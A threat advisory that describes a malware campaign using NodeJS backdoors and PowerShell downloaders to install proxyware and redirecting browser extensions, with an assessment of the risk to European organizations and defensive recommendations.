This threat involves a campaign leveraging NodeJS backdoors to distribute proxyware and monetization schemes. Attackers use Inno Setup installers to deploy PowerShell scripts that download and execute malicious NodeJS packages containing JavaScript code. These backdoors collect detailed system information and maintain communication with command and control (C2) servers, enabling remote execution of commands, including PowerShell scripts and additional NodeJS code. The campaign is linked to several proxyware applications such as Infatica, Honeygain, earnFM, and PacketLab, which are often used to monetize infected systems by routing traffic or providing proxy services without user consent. Additionally, the attackers deploy browser extensions that monitor user navigation and can redirect users to malicious URLs, increasing the risk of further compromise or fraud. The infrastructure supporting this campaign is extensive, utilizing numerous domains and cloud services to host malware and maintain resilient C2 channels. The attack techniques include persistence mechanisms (T1547.001), execution via PowerShell and NodeJS (T1059.001, T1059.003, T1059.007), masquerading (T1036.005), and data exfiltration (T1105, T1071.001). While no specific affected software versions are listed, the use of NodeJS and PowerShell indicates that systems running Windows environments with NodeJS installed are primarily targeted. The campaign does not currently have known exploits in the wild but represents a sophisticated threat combining backdoor access, proxyware monetization, and browser manipulation.

For European organizations, this threat poses several risks. The unauthorized installation of proxyware can degrade network performance and increase bandwidth costs, while also potentially implicating organizations in illicit activities due to traffic routing through their systems. The backdoor capabilities allow attackers to execute arbitrary commands, potentially leading to data theft, lateral movement, or deployment of additional malware. The browser extensions can compromise user privacy and facilitate phishing or drive-by download attacks. Given the use of legitimate tools like PowerShell and NodeJS, detection may be challenging, increasing dwell time and risk of damage. Organizations in Europe with extensive Windows infrastructure and use of NodeJS in development or production environments are particularly vulnerable. The monetization schemes may also lead to reputational damage if employees or systems are found to be participating in unauthorized proxy networks. Furthermore, the campaign’s use of cloud services and multiple domains complicates takedown efforts and incident response.

European organizations should implement multi-layered defenses tailored to this threat. Specifically, restrict the use of PowerShell and NodeJS execution to authorized scripts and applications by enforcing application whitelisting and script block logging. Monitor network traffic for unusual proxy connections or unexpected outbound communications to suspicious domains, leveraging threat intelligence feeds to identify known infrastructure related to this campaign. Conduct regular audits of installed browser extensions and enforce policies to prevent unauthorized extension installations. Employ endpoint detection and response (EDR) solutions capable of detecting anomalous PowerShell and NodeJS behaviors, including script downloads and execution patterns consistent with this campaign. Network segmentation can limit the spread of backdoors and proxyware within the organization. User awareness training should emphasize the risks of installing unauthorized software and browser extensions. Finally, collaborate with cloud service providers to monitor and restrict malicious hosting activities and consider deploying DNS filtering to block access to known malicious domains.